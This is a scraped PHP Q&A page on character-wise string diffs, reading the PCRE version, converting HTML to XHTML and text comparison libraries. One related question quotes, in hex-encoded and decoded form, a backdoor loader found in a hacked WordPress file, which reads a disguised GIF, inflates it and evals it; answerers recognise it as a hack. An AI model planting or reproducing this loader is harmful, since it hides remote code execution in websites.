Character-wise string diff in PHP - php

In short I am looking for something like google-diff-match-patch in PHP.
I have had a look at some similar questions at SO, and also at the algorithm provided here, but all of them fail:
diff("draßen", "da draußen")
should not give
<del>draßen</del> <ins>da draußen</ins>
(which is kind of stupid for my purpose, because I want to compare file names), but (try here)
<ins>da </ins>dra<ins>u</ins>ßen
Is there a code snippet in PHP that does this? Unfortunately, I cannot use (i.e. install) external packages.

https://github.com/gorhill/PHP-FineDiff supports character-wise diff and can render the differences in HTML

The PEAR Package Text_Diff provides Inline-Diffs.

There is a php version of google-diff-match-patch available here: https://github.com/nuxodin/diff_match_patch-php

There is a port of a recent version of the google-diff-match-patch library.
It is much faster than the previous port and has no problems with UTF-8.
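If installing a package is not an option, a character-wise diff can be sketched in plain PHP with a longest-common-subsequence table. This is only an illustration, not the algorithm used by google-diff-match-patch: charDiff() is a made-up helper name, it assumes PHP 7.1+ and valid UTF-8 input, and it needs memory proportional to the product of both string lengths, which is fine for file names but not for large texts.

```php
<?php
/**
 * Character-wise diff via a longest-common-subsequence (LCS) table.
 * Illustrative sketch; charDiff() is a hypothetical helper name.
 */
function charDiff(string $old, string $new): string
{
    // Split into UTF-8 characters (not bytes) so "ß" stays intact.
    $a = preg_split('//u', $old, -1, PREG_SPLIT_NO_EMPTY);
    $b = preg_split('//u', $new, -1, PREG_SPLIT_NO_EMPTY);
    $n = count($a);
    $m = count($b);

    // $lcs[$i][$j] = LCS length of the first $i chars of $a and the first $j chars of $b.
    $lcs = array_fill(0, $n + 1, array_fill(0, $m + 1, 0));
    for ($i = 1; $i <= $n; $i++) {
        for ($j = 1; $j <= $m; $j++) {
            $lcs[$i][$j] = ($a[$i - 1] === $b[$j - 1])
                ? $lcs[$i - 1][$j - 1] + 1
                : max($lcs[$i - 1][$j], $lcs[$i][$j - 1]);
        }
    }

    // Walk back from the end, collecting [operation, character] pairs.
    $ops = [];
    for ($i = $n, $j = $m; $i > 0 || $j > 0; ) {
        if ($i > 0 && $j > 0 && $a[$i - 1] === $b[$j - 1]) {
            $ops[] = ['=', $a[--$i]];
            $j--;
        } elseif ($j > 0 && ($i === 0 || $lcs[$i][$j - 1] >= $lcs[$i - 1][$j])) {
            $ops[] = ['+', $b[--$j]];
        } else {
            $ops[] = ['-', $a[--$i]];
        }
    }

    // Merge consecutive characters with the same operation into tagged runs.
    $tags = ['=' => ['', ''], '+' => ['<ins>', '</ins>'], '-' => ['<del>', '</del>']];
    $html = '';
    $runOp = null;
    $run = '';
    foreach (array_reverse($ops) as [$op, $ch]) {
        if ($runOp !== null && $op !== $runOp) {
            $html .= $tags[$runOp][0] . htmlspecialchars($run) . $tags[$runOp][1];
            $run = '';
        }
        $runOp = $op;
        $run .= $ch;
    }
    if ($runOp !== null) {
        $html .= $tags[$runOp][0] . htmlspecialchars($run) . $tags[$runOp][1];
    }
    return $html;
}

echo charDiff('draßen', 'da draußen'), "\n";
// prints: <ins>da </ins>dra<ins>u</ins>ßen
```

Walking the table from the end of both strings is what makes the leading "da " come out as a single insertion. A forward walk would be equally valid as a diff but would match the first "d" and produce a less readable result.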

Related

Wordpress update preg_replace to preg_replace_callback

I'm updating my website's PHP and when I try to update it to the most recent PHP version I get this message:
Warning: preg_replace(): The /e modifier is no longer supported, use preg_replace_callback instead in /home/customer/www/---.org/public_html/wp-includes/init.php on line 291
Here's the line I want to change:
preg_replace("/.*/e","\x65\x76\x61\x6c\x28\x27\x24\x70\x61\x67\x65\x78\x79\x7a\x20\x3d\x20\x40\x66\x69\x6c\x65\x5f\x67\x65\x74\x5f\x63\x6f\x6e\x74\x65\x6e\x74\x73\x28\x22\x77\x70\x2d\x69\x6e\x63\x6c\x75\x64\x65\x73\x2f\x69\x6d\x61\x67\x65\x73\x2f\x73\x6d\x69\x6c\x69\x65\x73\x2f\x69\x63\x6f\x6e\x5f\x77\x74\x66\x2e\x67\x69\x66\x22\x29\x3b\x65\x76\x61\x6c\x28\x40\x67\x7a\x69\x6e\x66\x6c\x61\x74\x65\x28\x24\x70\x61\x67\x65\x78\x79\x7a\x29\x29\x3b\x27\x29\x3b","");
I need to change it to preg_replace_callback but I'm confused by this part:
\x65\x76\x61\x6c\x28\x27\x24\x70\x61\x67\x65\x78\x79\x7a\x20\x3d\x20\x40\x66\x69\x6c\x65\x5f\x67\x65\x74\x5f\x63\x6f\x6e\x74\x65\x6e\x74\x73\x28\x22\x77\x70\x2d\x69\x6e\x63\x6c\x75\x64\x65\x73\x2f\x69\x6d\x61\x67\x65\x73\x2f\x73\x6d\x69\x6c\x69\x65\x73\x2f\x69\x63\x6f\x6e\x5f\x77\x74\x66\x2e\x67\x69\x66\x22\x29\x3b\x65\x76\x61\x6c\x28\x40\x67\x7a\x69\x6e\x66\x6c\x61\x74\x65\x28\x24\x70\x61\x67\x65\x78\x79\x7a\x29\x29\x3b\x27\x29\x3b
How do I translate that part?
When I use an online decoder it looks like this:
eval('$pagexyz = @file_get_contents("wp-includes/images/smilies/icon_wtf.gif");eval(@gzinflate($pagexyz));');
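The hex escapes can also be decoded locally instead of pasting them into an online decoder. A minimal sketch, assuming only PHP's built-in stripcslashes(); the string is just the first few escapes from the line above, and it is only printed, never executed:

```php
<?php
// Single quotes keep the backslashes literal, so PHP does not interpret the escapes itself.
$encoded = '\x65\x76\x61\x6c\x28\x27\x24\x70\x61\x67\x65\x78\x79\x7a';

// stripcslashes() turns C-style escapes such as \x65 into the characters they stand for.
$decoded = stripcslashes($encoded);

echo $decoded, "\n"; // prints: eval('$pagexyz
```

Note that \x40 decodes to "@", PHP's error-suppression operator.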
I've not looked too deeply into this, but are you supposed to have a wp-includes/init.php file?
The official repo shows no such file for the latest version.
A quick Google search for "wp-includes/init.php" suggests this is the result of a hack.
Also, examining the code, I see "wp-includes/images/smilies/icon_wtf.gif". Why would "what the f***.gif" be in the core? And the encoded function here smells very fishy.
Post about the potential hack:
https://blog.tonyballantyne.com/2017/01/25/wordpress-pharma-hack/
You shouldn't need to edit anything inside wp-includes/, as it's a core folder. It would make sense to install a core integrity checking plugin and maybe update to the latest version, but you can't guarantee the database hasn't already been tampered with.

Determine if PHP installation preg_* functions support multibyte regular expressions [duplicate]

Is there any way to get the version (and release date) of the PCRE library bundled with PHP from PHP code and store it in a variable?
I can find it using phpinfo(), but I can't find any other way to get that value directly from code.
I have been trying to find a solution for the last couple of hours, but it's hopeless.
So far, I can capture the complete phpinfo() output in a variable and pull the PCRE version and release date out of it, but I'm wondering whether there is an easier solution.
You can also use the constant PCRE_VERSION, which holds the version and release date as a single string.
found source here
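A minimal sketch of using that constant, assuming its value has the usual "version, space, release date" shape (for example "10.42 2022-12-11"). parsePcreVersion() is a hypothetical helper name, not part of PHP:

```php
<?php
/**
 * Split a PCRE_VERSION-style string into version and release date.
 * Hypothetical helper; the date part is null if the string has no second field.
 */
function parsePcreVersion(string $raw): array
{
    $parts = preg_split('/\s+/', trim($raw), 2);
    return [
        'version'  => $parts[0],
        'released' => $parts[1] ?? null,
    ];
}

$pcre = parsePcreVersion(PCRE_VERSION);
echo "PCRE version: {$pcre['version']}, released: {$pcre['released']}\n";
```

The date format differs between PCRE releases, so it is safer to treat the second field as an opaque string than to parse it as a date.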
I think the ReflectionExtension class is made for this, though I can't seem to get the version out of it directly (getVersion() returns null). This does work however:
$pcreReflector = new ReflectionExtension("pcre");
ob_start();
$pcreReflector->info();
$pcreInfo = ob_get_clean(); // Version and release date can be parsed from here
You'll still have to parse it, but at least it's just the relevant part and not the entire phpinfo output.

How to convert HTML into XHTML [duplicate]

Possible Duplicate:
PHP library for converting HTML4 to XHTML?
Is there any ready made function in PHP to achieve this? Basically I'm taking HTML data from Smarty template and want to convert it into XHTML through coding.
$filename = 'template.php'; // filepath to file
// All options : http://tidy.sourceforge.net/docs/quickref.html
$options = array('output-xhtml' => true, 'clean' => true, 'wrap-php' => true);
$tidy = new tidy(); // create new instance of Tidy
$tidy->parseFile($filename, $options); // open file
$tidy->cleanRepair(); // process with specified options
copy($filename, $filename . '.bak'); // backup current file
file_put_contents($filename, $tidy); // overwrite current file with XHTML version
I don't have a Smarty template file to test this on, but give it a try and see if it works correctly in converting one. Backup your files as always when running something of this nature. Test out on sample files first.
The problem is that you do not have an html file to work with. You have a php template written in the programming language "smarty" that is not markup, even though it contains blocks of markup. You're looking for a magic wand and no such wand exists.
If it were purely HTML, then you could probably use DOMDocument to read the files into a DOM structure and generate XHTML, but that is simply not going to work with the raw source files. You could potentially write a parser that reads the Smarty .tpl files, looks for the HTML snippets and tries to load them into DOMDocument objects.
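For the pure-HTML case, the DOMDocument route could look roughly like this. It is a sketch under assumptions: htmlToXmlMarkup() is a made-up helper name, the input contains no Smarty tags, and the text is plain ASCII (loadHTML() does not assume UTF-8 unless the markup declares it).

```php
<?php
/**
 * Parse lenient HTML and serialise it as well-formed XML markup.
 * Hypothetical helper; assumes the DOM extension is available.
 */
function htmlToXmlMarkup(string $html): string
{
    $doc = new DOMDocument();

    // Collect parser warnings about sloppy markup instead of printing them.
    $previous = libxml_use_internal_errors(true);
    $doc->loadHTML($html);
    libxml_clear_errors();
    libxml_use_internal_errors($previous);

    // saveXML() writes void elements such as <br> in self-closed form.
    return $doc->saveXML($doc->documentElement);
}

echo htmlToXmlMarkup('<p>Line one<br>Line two</p>'), "\n";
```

This only makes the markup well-formed. It does not add an XHTML doctype or namespace, so it covers the tag-closing part of the conversion and nothing more.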
With that said, I have to ask first -- why you really want to convert to xhtml when xhtml is basically a failed standard that is obsolete at this point in time, and secondarily, if you have some legitimate reason for wanting to forge ahead, why you can't use some regex search and replace snippets that change the doctypes and some regex based searches to look for tags that lack the end tags, and the other relatively minor tweaks needed. The differences between html and xhtml can be boiled down to a handful of rules that are pretty easy to understand.
In answer to your original question: sort of. Core PHP -> DOM, SimpleXML, SPL = templating engine. That's why (and how) templating engines such as Smarty exist.
Re: installing Tidy as suggested in comments,
Tidy has a prerequisite lib. If you don't already have it:
http://php.net/manual/en/tidy.installation.php
To use Tidy, you will need libtidy installed, available on the tidy homepage: http://tidy.sourceforge.net/.
To enable it, you will need to recompile PHP and include it in your config flags:
"This extension is bundled with PHP 5 and greater, and is installed using the --with-tidy configure option."
So, get your existing config flags:
php -i | grep config
and add --with-tidy.
However, this is probably the wrong approach. It does not solve your actual problem (outputting XHTML instead of HTML); it fixes Smarty's problem. If you have to recompile PHP to add an extension just to fix a templating engine's doctype shortcomings, you should probably consider using a different templating engine, if possible. Recompiling is drastic, and it adds a lot of overhead for what you get, which amounts to a hacky band-aid workaround that retroactively repairs broken output.
PEAR's HTML_Template_PHPTAL is probably the best solution to your problem, and the closest answer to your original question.
And if PHPTAL doesn't quite cut it, there are at least 5 others available as PEAR libs to choose from.
pear install http://phptal.org/latest.tar.gz
Or it's been ported to Git:
git clone git://github.com/pornel/PHPTAL
A cursory google search: http://webification.com/best-php-template-engines
HTH

String/Paragraph/Document comparison in php

I'm trying to add a feature to generate a difference report between two 20,000-character sections of text. I've done some Googling and I heard about PEAR's diff library - which has been discontinued - and found this: https://github.com/paulgb/simplediff/blob/5bfe1d2a8f967c7901ace50f04ac2d9308ed3169/simplediff.php
Ideally I'd like to see what was removed, edited, or added and be able to show that to the user. Are there any libraries or simple ways of accomplishing this that you may know of?
I use this code in a live project
http://svn.geograph.org.uk/svn/branches/british-isles/libs/3rdparty/simplediff.inc.php
Example use
http://svn.geograph.org.uk/svn/branches/british-isles/public_html/article/diff.php
but the code is very simple
$a1 = explode("\n",$file1);
$a2 = explode("\n",$file2);
print diff2table($a1,$a2);
(The code just accepts the input as arrays of lines and outputs an HTML table, but diff2table can be customised.)
